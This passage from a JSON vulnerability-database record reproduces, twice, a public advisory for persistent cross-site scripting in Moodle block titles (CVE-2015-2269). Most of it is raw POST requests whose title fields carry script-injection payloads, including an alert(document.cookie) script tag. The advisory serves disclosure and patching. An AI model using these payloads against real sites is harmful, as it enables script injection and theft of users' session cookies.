http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php\r\n\r\nVendor Advisory ID: MSA-15-0013\r\nVendor Advisory URL: https://moodle.org/mod/forum/discuss.php?d=307383\r\n\r\nCVE ID: CVE-2015-2269\r\nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2269\r\n\r\n\r\n09.02.2015\r\n\r\n--\r\n\r\n\r\nRandom Glossary Entry\r\n---------------------\r\n\r\nPOST http://WEB/my/index.php HTTP/1.1\r\n\r\n\r\n_qf__block_glossary_random_edit_form=1\r\nbui_contexts=0\r\nbui_defaultregion=side-pre\r\nbui_defaultweight=4\r\nbui_editid=304\r\nbui_editingatfrontpage=0\r\nbui_pagetypepattern=my-index\r\nbui_parentcontextid=411\r\nbui_region=side-pre\r\nbui_subpagepattern=%@NULL@%\r\nbui_visible=1\r\nbui_weight=4\r\nconfig_addentry=test\r\nconfig_invisible=test2\r\nconfig_refresh=0\r\nconfig_showconcept=1\r\nconfig_title=\" onmouseover=prompt(\"XSS1\") >\r\nconfig_type=0\r\nconfig_viewglossary=test3\r\nmform_isexpanded_id_configheader=1\r\nmform_isexpanded_id_onthispage=0\r\nmform_isexpanded_id_whereheader=0\r\nsesskey=S8TXvxdEKF\r\nsubmitbutton=Save changes\r\n\r\n\r\nRemote RSS Feeds\r\n----------------\r\n\r\nPOST http://WEB/my/index.php HTTP/1.1\r\n\r\n\r\n_qf__block_rss_client_edit_form=1\r\nbui_contexts=0\r\nbui_defaultregion=side-pre\r\nbui_defaultweight=4\r\nbui_editid=312\r\nbui_editingatfrontpage=0\r\nbui_pagetypepattern=my-index\r\nbui_parentcontextid=411\r\nbui_region=side-pre\r\nbui_subpagepattern=%@NULL@%\r\nbui_visible=1\r\nbui_weight=4\r\nconfig_block_rss_client_show_channel_image=0\r\nconfig_block_rss_client_show_channel_link=0\r\nconfig_display_description=0\r\nconfig_rssid=_qf__force_multiselect_submission\r\nconfig_rssid[]=3\r\nconfig_shownumentries=11\r\nconfig_title=\" onmouseover=prompt(\"XSS2\") >\r\nmform_isexpanded_id_configheader=1\r\nmform_isexpanded_id_onthispage=0\r\nmform_isexpanded_id_whereheader=0\r\nsesskey=S8TXvxdEKF\r\nsubmitbutton=Save changes\r\n\r\n\r\nTags\r\n----\r\n\r\nPOST http://WEB/my/index.php HTTP/1.1\r\n\r\n\r\n_qf__block_tags_edit_form=1\r\nbui_contexts=0\r\nbui_defaultregion=side-pre\r\nbui_defaultweight=4\r\nbui_editid=313\r\nbui_editingatfrontpage=0\r\nbui_pagetypepattern=my-index\r\nbui_parentcontextid=411\r\nbui_region=side-pre\r\nbui_subpagepattern=%@NULL@%\r\nbui_visible=1\r\nbui_weight=4\r\nconfig_numberoftags=80\r\nconfig_tagtype=\r\nconfig_title=Tags\" onmouseover=prompt(\"XSS3\") >\r\nmform_isexpanded_id_configheader=1\r\nmform_isexpanded_id_onthispage=0\r\nmform_isexpanded_id_whereheader=0\r\nsesskey=S8TXvxdEKF\r\nsubmitbutton=Save changes\r\n\r\n\r\nOlder not supported versions\r\n----------------------------\r\n\r\nPOST http://WEB/blog/index.php HTTP/1.1\r\n\r\nblockaction=config\r\nfilterselect=1343\r\nfiltertype=user\r\ninstanceid=4992\r\nnumberoftags=20\r\nsesskey=0QCG5LQz0Q\r\nsort=name\r\ntimewithin=90\r\ntitle=ZSL\"><script>alert(document.cookie);</script>\r\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/moodle_xss.txt"}], "zdt": [{"lastseen": "2018-02-18T17:29:51", "description": "Exploit for php platform in category web applications", "edition": 2, "published": "2015-03-20T00:00:00", "type": "zdt", "title": "Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2269"], "modified": "2015-03-20T00:00:00", "id": "1337DAY-ID-23411", "href": "https://0day.today/exploit/description/23411", "sourceData": "Moodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site Scripting\r\n \r\n \r\nVendor: Moodle Pty Ltd\r\nProduct web page: https://www.moodle.org\r\nAffected version: 2.8.3, 2.7.5, 2.6.8 and 2.5.9\r\n \r\nSummary: Moodle is a learning platform designed to provide\r\neducators, administrators and learners with a single robust,\r\nsecure and integrated system to create personalised learning\r\nenvironments.\r\n \r\nDesc: Moodle suffers from persistent XSS vulnerabilities. Input\r\npassed to the POST parameters 'config_title' and 'title' thru\r\nindex.php, are not properly sanitized allowing the attacker to\r\nexecute HTML or JS code into user's browser session on the affected\r\nsite. Affected components: Blocks, Glossary, RSS and Tags.\r\n \r\nTested on: nginx\r\n PHP/5.4.22\r\n \r\n \r\nVulnerabilities discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2015-5236\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php\r\n \r\nVendor Advisory ID: MSA-15-0013\r\nVendor Advisory URL: https://moodle.org/mod/forum/discuss.php?d=307383\r\n \r\nCVE ID: CVE-2015-2269\r\nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2269\r\n \r\n \r\n09.02.2015\r\n \r\n--\r\n \r\n \r\nRandom Glossary Entry\r\n---------------------\r\n \r\nPOST http://WEB/my/index.php HTTP/1.1\r\n \r\n \r\n_qf__block_glossary_random_edit_form=1\r\nbui_contexts=0\r\nbui_defaultregion=side-pre\r\nbui_defaultweight=4\r\nbui_editid=304\r\nbui_editingatfrontpage=0\r\nbui_pagetypepattern=my-index\r\nbui_parentcontextid=411\r\nbui_region=side-pre\r\nbui_subpagepattern=%@[email\u00a0protected]%\r\nbui_visible=1\r\nbui_weight=4\r\nconfig_addentry=test\r\nconfig_invisible=test2\r\nconfig_refresh=0\r\nconfig_showconcept=1\r\nconfig_title=\" onmouseover=prompt(\"XSS1\") >\r\nconfig_type=0\r\nconfig_viewglossary=test3\r\nmform_isexpanded_id_configheader=1\r\nmform_isexpanded_id_onthispage=0\r\nmform_isexpanded_id_whereheader=0\r\nsesskey=S8TXvxdEKF\r\nsubmitbutton=Save changes\r\n \r\n \r\nRemote RSS Feeds\r\n----------------\r\n \r\nPOST http://WEB/my/index.php HTTP/1.1\r\n \r\n \r\n_qf__block_rss_client_edit_form=1\r\nbui_contexts=0\r\nbui_defaultregion=side-pre\r\nbui_defaultweight=4\r\nbui_editid=312\r\nbui_editingatfrontpage=0\r\nbui_pagetypepattern=my-index\r\nbui_parentcontextid=411\r\nbui_region=side-pre\r\nbui_subpagepattern=%@[email\u00a0protected]%\r\nbui_visible=1\r\nbui_weight=4\r\nconfig_block_rss_client_show_channel_image=0\r\nconfig_block_rss_client_show_channel_link=0\r\nconfig_display_description=0\r\nconfig_rssid=_qf__force_multiselect_submission\r\nconfig_rssid[]=3\r\nconfig_shownumentries=11\r\nconfig_title=\" onmouseover=prompt(\"XSS2\") >\r\nmform_isexpanded_id_configheader=1\r\nmform_isexpanded_id_onthispage=0\r\nmform_isexpanded_id_whereheader=0\r\nsesskey=S8TXvxdEKF\r\nsubmitbutton=Save changes\r\n \r\n \r\nTags\r\n----\r\n \r\nPOST http://WEB/my/index.php HTTP/1.1\r\n \r\n \r\n_qf__block_tags_edit_form=1\r\nbui_contexts=0\r\nbui_defaultregion=side-pre\r\nbui_defaultweight=4\r\nbui_editid=313\r\nbui_editingatfrontpage=0\r\nbui_pagetypepattern=my-index\r\nbui_parentcontextid=411\r\nbui_region=side-pre\r\nbui_subpagepattern=%@[email\u00a0protected]%\r\nbui_visible=1\r\nbui_weight=4\r\nconfig_numberoftags=80\r\nconfig_tagtype=\r\nconfig_title=Tags\" onmouseover=prompt(\"XSS3\") >\r\nmform_isexpanded_id_configheader=1\r\nmform_isexpanded_id_onthispage=0\r\nmform_isexpanded_id_whereheader=0\r\nsesskey=S8TXvxdEKF\r\nsubmitbutton=Save changes\r\n \r\n \r\nOlder not supported versions\r\n----------------------------\r\n \r\nPOST http://WEB/blog/index.php HTTP/1.1\r\n \r\nblockaction=config\r\nfilterselect=1343\r\nfiltertype=user\r\ninstanceid=4992\r\nnumberoftags=20\r\nsesskey=0QCG5LQz0Q\r\nsort=name\r\ntimewithin=90\r\ntitle=ZSL\"><script>alert(document.cookie);</script>\n\n# 0day.today [2018-02-18] #", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/23411"}]}